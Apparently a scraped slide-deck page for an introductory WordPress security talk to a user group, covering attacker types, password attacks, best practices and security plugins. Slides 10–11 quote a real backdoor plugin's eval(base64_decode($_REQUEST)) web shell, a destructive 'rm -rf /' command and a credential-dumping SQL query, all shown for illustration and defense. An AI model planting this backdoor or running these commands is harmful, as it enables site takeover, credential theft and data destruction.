New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 

Intro to Wordpress Security

  • 1. Intro to Wordpress Security Prepared for the Oklahoma City Wordpress User Group by Chris Dodds
  • 2. Chris Dodds Owner & Principal Advisor at Focusfire IT Strategy & Consulting Features: Ten+ years of experience across multiple industries and IT disciplines. Certifications: CISSP System Requirements: Food, water, & MCITP:SA internet connectivity. Security+ Network+
  • 3. This talk is not about the top 5 WP security threats.
  • 5. Betty’s Fancy Blog o’ Gnomes Betty’s Betty’s Fancy Betty’s Fancy Fancy Server Employer Audience
  • 6. It’s not about you, Betty.
  • 7. The Players Script kiddies Hacktivists Pro Criminals Information Warriors
  • 9. Password Attacks Exploit weak passwords Dictionary based Can be entirely automated
  • 10. ToolsPack Plugin toolspack.php <?php /* Plugin  Name:  ToolsPack Description:  Supercharge  your  WordPress  site  with  powerful  features   previously  only  available  to  WordPress.com  users.  core  release.  Keep  the   plugin  updated! Version:  1.2 Author:  Mark  Stain Author  URI:  http://checkWPTools.com/ */ $_REQUEST[e]  ?  EVAL(  base64_decode(  $_REQUEST[e]  )  )  :  exit; ?> Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
  • 11. This backdoor code allows the remote user to: Execute commands on you server $WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`; Execute commands against your WP database SELECT login + '-' + password FROM users
  • 12. More Likely... Payload - keylogger, trojan, spyware, virus SEO Spam - links, keywords “garden gnomes, free chaps, leather sale, cheap sex, porn, prescription drugs, coupons, free avon”
  • 13. Best Practices Update! Update! Update! Backup & test your backups. Use a unique passphrase. Don’t use the “admin” user. Disable or delete un-used plugins.
  • 14. These are all things your attacker will do once they control your site.
  • 15. Recommended Plugins Backup BackWPup - open-source or BackupBuddy - commercial Security Better WP Security - open-source Limit Login Attempts - open-source Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
  • 16. Contact and Q&A Chris Dodds e-mail - chris.dodds@focusfire.net twitter - @doddschris web - chrisdodds.net